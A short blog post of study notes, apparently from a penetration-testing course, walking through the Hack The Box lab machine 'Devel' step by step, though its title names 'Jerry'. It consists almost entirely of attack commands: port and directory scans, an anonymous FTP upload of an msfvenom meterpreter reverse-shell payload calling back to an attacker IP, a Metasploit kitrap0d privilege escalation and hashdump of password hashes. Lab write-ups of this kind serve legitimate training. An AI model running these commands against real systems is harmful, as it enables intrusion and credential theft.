TCM PEH Hacking Jerry Notes

on March 16, 2021 under certs

1 minute read

HTB Devel

nmap -T4 -A -p- 10.10.10.5
Noted port 21 open
Noted possible web root dir at port 21 contents
Noted port 80
Noted possible default page at port 80
Noted Windows OS

Visited http://10.10.10.5:80
view source
Noted confirmed default webpage IIS7
dirbuster&
http://10.10.10.5:80
check more threads
usr/share/wordlist/dirbuster/*small.txt
check directories
check files
check recurse
file extention asm, asmx, asp, aspx, txt, zip, bak, rar
start

cd Desktop
ftp 10.10.10.5
anonymous
anonymous
help
ls
pwd
put dog.jpg
ls
Noted it did copy in dog.jpg

Googled msfvenom, looked for .asp payload format
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.24 LPORT=4444 -f aspx > ex.aspx
msfconsole
use exploit/multi/handler
options
set payload windows/meterpreter/reverse_tcp
options
set LHOST 10.10.14.24
set LPORT 4444
run

ftp 10.10.10.5
anynomous
anonymous
binary
put ex.aspx

http://10.10.10.5/ex.aspx

In metasploit
sysinfo
getuid
Noted not root
hashdump
getsystem
background
search suggester
use post/multi/recon/local_exploit_suggester
set session 1
exploit
use /exploit/windows/local/ms10_015_kitrap0d
options
set session 1
options
exploit
Noted failed, but more options will show now
options
set LHOST 10.10.14.24
set LPORT 4445
exploit
Note failed because listener died
use exploit/multi/handler
options
run
background
use /exploit/windows/local/ms10_015_kitrap0d
set session 2
options
exploit
Noted meterpreter shell
getuid
Noted root
hashdump

certs, pwned

I feedback.
Let me know what you think of this article on twitter @cpardue09 or leave a comment below!